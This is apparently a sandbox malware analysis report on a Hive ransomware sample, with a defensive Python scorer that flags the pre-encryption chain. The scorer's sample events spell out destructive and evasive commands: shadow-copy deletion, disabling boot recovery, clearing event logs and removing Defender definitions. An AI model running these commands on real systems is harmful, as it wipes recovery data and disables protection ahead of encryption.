Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-tz73dsdbg3
Target 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.7z
SHA256 fcada897acd117428099d941fb0f515658f7c13b9808c260e8f8feeaa7a0badb
Tags
evasion ransomware trojan hive spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fcada897acd117428099d941fb0f515658f7c13b9808c260e8f8feeaa7a0badb

Threat Level: Known bad

The file 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware trojan hive spyware stealer

Deletes Windows Defender Definitions

Hive

Modifies security service

Modifies Windows Defender Real-time Protection settings

Deletes shadow copies

Modifies boot configuration data using bcdedit

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Modifies registry class

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Runs net.exe
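The summary above is the usual pre-encryption chain run through built-in tools: Defender is disabled (WinDefend Start=4, definitions removed, context-menu handler keys deleted), shadow copies are deleted, boot recovery is turned off with bcdedit, event logs are cleared, and services are stopped via net.exe and sc.exe. The block below is an added example, not part of this report or the sandbox's output: a small scorer that runs over process-creation and registry events and flags a process tree that hits several of those tactics at once. The report only records image paths and the one registry value, so the command lines in the sample events are constructed reconstructions of the documented forms of those tools, not command lines recovered from the sample.

```python
"""Score endpoint telemetry for the pre-encryption chain this report lists:
Defender tampering, shadow-copy deletion, boot-recovery changes, event-log
clearing and service stops. Sample events below are constructed for the
example; the report records only the image paths and one registry value."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str    # "process" (detail = command line) or "registry" (detail = op, key, value)
    image: str   # full path of the process performing the action
    detail: str


# (tactic, executing image, regex over the lower-cased detail).
# The regexes describe the documented command forms of these built-in tools; the
# exact arguments the sample used are not in the report and are assumed here.
RULES = [
    ("defender_service_disabled", "reg.exe",
     r"services\\windefend.*\bstart\b.*\b4\b"),          # Start=4 is SERVICE_DISABLED
    ("defender_definitions_removed", "mpcmdrun.exe", r"-removedefinitions"),
    ("defender_shellext_removed", "reg.exe",
     r"delete .*\\shellex\\contextmenuhandlers\\epp\b"), # Defender context-menu handler keys
    ("shadow_copies_deleted", "vssadmin.exe", r"delete shadows"),
    ("shadow_copies_deleted", "wmic.exe", r"shadowcopy delete"),
    ("boot_recovery_disabled", "bcdedit.exe",
     r"recoveryenabled no|bootstatuspolicy ignoreallfailures"),
    ("event_logs_cleared", "wevtutil.exe", r"\bcl\b|clear-log"),
    ("services_stopped", "net.exe", r"\bstop\b"),
    ("services_stopped", "sc.exe", r"\bstop\b|config .*start= disabled"),
]


def score_events(events):
    """Map each matched tactic to the event details that triggered it."""
    hits = {}
    for ev in events:
        image = ev.image.rsplit("\\", 1)[-1].lower()
        detail = ev.detail.lower()
        for tactic, proc, pattern in RULES:
            if image == proc and re.search(pattern, detail):
                hits.setdefault(tactic, []).append(ev.detail)
    return hits


def verdict(hits, threshold=3):
    """Treat three or more distinct tactics from one process tree as ransomware-like."""
    tactics = sorted(hits)
    return {"tactics": tactics, "count": len(tactics),
            "ransomware_like": len(tactics) >= threshold}


SAMPLE_EVENTS = [  # constructed, modelled on the signatures in this report
    Event("registry", r"C:\Windows\SYSTEM32\reg.exe",
          r"Set value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = 4"),
    Event("process", r"C:\Program Files\Windows Defender\MpCmdRun.exe",
          r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    Event("process", r"C:\Windows\SYSTEM32\reg.exe",
          r"reg delete HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP /f"),
    Event("process", r"C:\Windows\SYSTEM32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    Event("process", r"C:\Windows\System32\Wbem\wmic.exe", "wmic.exe shadowcopy delete"),
    Event("process", r"C:\Windows\SYSTEM32\bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled no"),
    Event("process", r"C:\Windows\SYSTEM32\bcdedit.exe",
          "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    Event("process", r"C:\Windows\SYSTEM32\wevtutil.exe", "wevtutil.exe cl Security"),
    Event("process", r"C:\Windows\SYSTEM32\net.exe", "net stop WinDefend"),
    Event("process", r"C:\Windows\SYSTEM32\sc.exe", "sc config WinDefend start= disabled"),
    Event("process", r"C:\Windows\SYSTEM32\PING.EXE", "ping 127.0.0.1 -n 5"),  # benign, no rule
]

if __name__ == "__main__":
    print(verdict(score_events(SAMPLE_EVENTS)))
```

Any single tactic here has legitimate uses (an administrator clearing a log, a backup tool touching shadow copies), which is why the verdict is on the number of distinct tactics from one tree rather than on any one match; in a real pipeline the parent process should be carried on the Event so that the grouping is per tree, not per host.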

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:30

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:30

Reported

2022-01-12 16:36

Platform

win10-en-20211208

Max time kernel

40s

Max time network

169s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JAAAACQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DAAAAAwAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_MAAAADAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_KgAAACoAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_HAAAABwAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EAAAABAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_LAAAACwAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BgAAAAYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_PgAAAD4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NAAAADQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kab.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-io.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
